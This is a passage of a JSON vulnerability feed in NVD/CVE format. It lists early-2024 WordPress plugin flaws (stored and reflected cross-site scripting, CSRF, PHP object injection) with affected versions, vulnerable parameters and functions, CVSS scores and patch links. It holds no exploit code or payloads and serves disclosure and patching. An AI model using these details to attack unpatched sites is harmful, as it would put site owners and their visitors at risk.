"https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033238%40internal-links&new=3033238%40internal-links&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033238%40internal-links&new=3033238%40internal-links&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033238%40internal-links&new=3033238%40internal-links&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/41d39fe4-b114-4612-92f6-75d6597610f7?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/41d39fe4-b114-4612-92f6-75d6597610f7?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/41d39fe4-b114-4612-92f6-75d6597610f7?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/41d39fe4-b114-4612-92f6-75d6597610f7?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Internal Link Juicer: SEO Auto Linker for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings such as 'ilj_settings_field_links_per_page' in all versions up to, and including, 2.23.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:internallinkjuicer:internal_link_juicer:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.23.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-09T05:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0658", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033503%40insert-php-code-snippet&new=3033503%40insert-php-code-snippet&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033503%40insert-php-code-snippet&new=3033503%40insert-php-code-snippet&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033503%40insert-php-code-snippet&new=3033503%40insert-php-code-snippet&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033503%40insert-php-code-snippet&new=3033503%40insert-php-code-snippet&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c4a6b786-d0ef-41f6-b2bf-83307ec02b91?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c4a6b786-d0ef-41f6-b2bf-83307ec02b91?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c4a6b786-d0ef-41f6-b2bf-83307ec02b91?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c4a6b786-d0ef-41f6-b2bf-83307ec02b91?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Insert PHP Code Snippet plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the user's name when accessing the insert-php-code-snippet-manage page in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:f1logic:insert_php_code_snippet:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.3.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-29T01:43Z", "lastModifiedDate" : "2025-03-04T12:24Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0659", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?old_path=/easy-digital-downloads/tags/3.2.6&old=3030600&new_path=/easy-digital-downloads/tags/3.2.7&new=3030600&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?old_path=/easy-digital-downloads/tags/3.2.6&old=3030600&new_path=/easy-digital-downloads/tags/3.2.7&new=3030600&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?old_path=/easy-digital-downloads/tags/3.2.6&old=3030600&new_path=/easy-digital-downloads/tags/3.2.7&new=3030600&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?old_path=/easy-digital-downloads/tags/3.2.6&old=3030600&new_path=/easy-digital-downloads/tags/3.2.7&new=3030600&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1ec207cd-cae5-4950-bbc8-d28f108b4ae7?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1ec207cd-cae5-4950-bbc8-d28f108b4ae7?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1ec207cd-cae5-4950-bbc8-d28f108b4ae7?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1ec207cd-cae5-4950-bbc8-d28f108b4ae7?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Easy Digital Downloads – Sell Digital Files (eCommerce Store & Payments Made Easy) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the variable pricing option title in all versions up to, and including, 3.2.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with shop manger-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:awesomemotive:easy_digital_downloads:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "3.2.6", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2025-02-07T19:44Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0660", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3026901/formidable/tags/6.8/classes/controllers/FrmFormsController.php", "name" : "https://plugins.trac.wordpress.org/changeset/3026901/formidable/tags/6.8/classes/controllers/FrmFormsController.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3026901/formidable/tags/6.8/classes/controllers/FrmFormsController.php", "name" : "https://plugins.trac.wordpress.org/changeset/3026901/formidable/tags/6.8/classes/controllers/FrmFormsController.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b983d22b-6cd2-4450-99e2-88bb149091fe?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b983d22b-6cd2-4450-99e2-88bb149091fe?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b983d22b-6cd2-4450-99e2-88bb149091fe?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b983d22b-6cd2-4450-99e2-88bb149091fe?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Formidable Forms – Contact Form, Survey, Quiz, Payment, Calculator Form & Custom Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.7.2. This is due to missing or incorrect nonce validation on the update_settings function. This makes it possible for unauthenticated attackers to change form settings and add malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:strategy11:formidable_forms:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "6.7.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0662", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3058912%40fancybox-for-wordpress&new=3058912%40fancybox-for-wordpress&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3058912%40fancybox-for-wordpress&new=3058912%40fancybox-for-wordpress&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3058912%40fancybox-for-wordpress&new=3058912%40fancybox-for-wordpress&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3058912%40fancybox-for-wordpress&new=3058912%40fancybox-for-wordpress&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/55f8d7e6-7bcd-4556-932b-7bf422db0b39?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/55f8d7e6-7bcd-4556-932b-7bf422db0b39?source=cve", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/55f8d7e6-7bcd-4556-932b-7bf422db0b39?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/55f8d7e6-7bcd-4556-932b-7bf422db0b39?source=cve", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The FancyBox for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions 3.0.2 to 3.3.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:colorlib:fancybox:*:*:*:*:*:wordpress:*:*", "versionStartIncluding" : "3.0.2", "versionEndExcluding" : "3.3.3", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-04-09T19:15Z", "lastModifiedDate" : "2025-05-06T15:24Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0663", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rejected reason: REJECT: This is a false positive report." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-01-19T20:15Z", "lastModifiedDate" : "2024-01-19T20:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0664", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027347%40meks-smart-social-widget&new=3027347%40meks-smart-social-widget&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027347%40meks-smart-social-widget&new=3027347%40meks-smart-social-widget&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027347%40meks-smart-social-widget&new=3027347%40meks-smart-social-widget&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027347%40meks-smart-social-widget&new=3027347%40meks-smart-social-widget&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/722aae99-fcfb-4234-9245-5db57aaa03c5?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/722aae99-fcfb-4234-9245-5db57aaa03c5?source=cve", "refsource" : "", "tags" : [ "Patch", "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/722aae99-fcfb-4234-9245-5db57aaa03c5?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/722aae99-fcfb-4234-9245-5db57aaa03c5?source=cve", "refsource" : "", "tags" : [ "Patch", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Meks Smart Social Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Meks Smart Social Widget in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mekshq:meks_smart_social_widget:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.6.3", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-27T04:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0665", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3025865/customer-area/trunk/src/php/core-addons/admin-area/templates/dashboard-page.template.php", "name" : "https://plugins.trac.wordpress.org/changeset/3025865/customer-area/trunk/src/php/core-addons/admin-area/templates/dashboard-page.template.php", "refsource" : "", "tags" : [ "Patch", "Release Notes" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3025865/customer-area/trunk/src/php/core-addons/admin-area/templates/dashboard-page.template.php", "name" : "https://plugins.trac.wordpress.org/changeset/3025865/customer-area/trunk/src/php/core-addons/admin-area/templates/dashboard-page.template.php", "refsource" : "", "tags" : [ "Patch", "Release Notes" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024180%40customer-area&new=3024180%40customer-area&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024180%40customer-area&new=3024180%40customer-area&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch", "Release Notes" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024180%40customer-area&new=3024180%40customer-area&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024180%40customer-area&new=3024180%40customer-area&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch", "Release Notes" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/567d62ec-e868-45e2-b07a-8cc661d7c5e1?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/567d62ec-e868-45e2-b07a-8cc661d7c5e1?source=cve", "refsource" : "", "tags" : [ "Patch", "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/567d62ec-e868-45e2-b07a-8cc661d7c5e1?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/567d62ec-e868-45e2-b07a-8cc661d7c5e1?source=cve", "refsource" : "", "tags" : [ "Patch", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP Customer Area plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 8.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:marvinlabs:wp_customer_area:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "8.2.3", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-24T08:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0667", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/form-maker/tags/1.15.21/booster/controller.php#L34", "name" : "https://plugins.trac.wordpress.org/browser/form-maker/tags/1.15.21/booster/controller.php#L34", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/form-maker/tags/1.15.21/booster/controller.php#L34", "name" : "https://plugins.trac.wordpress.org/browser/form-maker/tags/1.15.21/booster/controller.php#L34", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027368%40form-maker&new=3027368%40form-maker&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027368%40form-maker&new=3027368%40form-maker&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027368%40form-maker&new=3027368%40form-maker&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027368%40form-maker&new=3027368%40form-maker&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d55c832b-f558-4e8a-8301-33dd38d39ef1?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d55c832b-f558-4e8a-8301-33dd38d39ef1?source=cve", "refsource" : "", "tags" : [ "Patch", "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d55c832b-f558-4e8a-8301-33dd38d39ef1?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d55c832b-f558-4e8a-8301-33dd38d39ef1?source=cve", "refsource" : "", "tags" : [ "Patch", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.15.21. This is due to missing or incorrect nonce validation on the 'execute' function. This makes it possible for unauthenticated attackers to execute arbitrary methods in the 'BoosterController' class via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:10web:form_maker:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.15.21", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "LOW", "baseScore" : 6.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.4 } }, "publishedDate" : "2024-01-27T04:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0668", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-502" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/advanced-database-cleaner/tags/3.1.3/includes/class_clean_cron.php#L224", "name" : "https://plugins.trac.wordpress.org/browser/advanced-database-cleaner/tags/3.1.3/includes/class_clean_cron.php#L224", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/advanced-database-cleaner/tags/3.1.3/includes/class_clean_cron.php#L224", "name" : "https://plugins.trac.wordpress.org/browser/advanced-database-cleaner/tags/3.1.3/includes/class_clean_cron.php#L224", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/advanced-database-cleaner/tags/3.1.3/includes/class_clean_cron.php#L298", "name" : "https://plugins.trac.wordpress.org/browser/advanced-database-cleaner/tags/3.1.3/includes/class_clean_cron.php#L298", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/advanced-database-cleaner/tags/3.1.3/includes/class_clean_cron.php#L298", "name" : "https://plugins.trac.wordpress.org/browser/advanced-database-cleaner/tags/3.1.3/includes/class_clean_cron.php#L298", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3025980/", "name" : "https://plugins.trac.wordpress.org/changeset/3025980/", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3025980/", "name" : "https://plugins.trac.wordpress.org/changeset/3025980/", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e0b8c24b-3e51-4637-9d8e-da065077d082?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e0b8c24b-3e51-4637-9d8e-da065077d082?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e0b8c24b-3e51-4637-9d8e-da065077d082?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e0b8c24b-3e51-4637-9d8e-da065077d082?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Advanced Database Cleaner plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.1.3 via deserialization of untrusted input in the 'process_bulk_action' function. This makes it possible for authenticated attacker, with administrator access and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:sigmaplugin:advanced_database_cleaner:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "3.1.3", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, 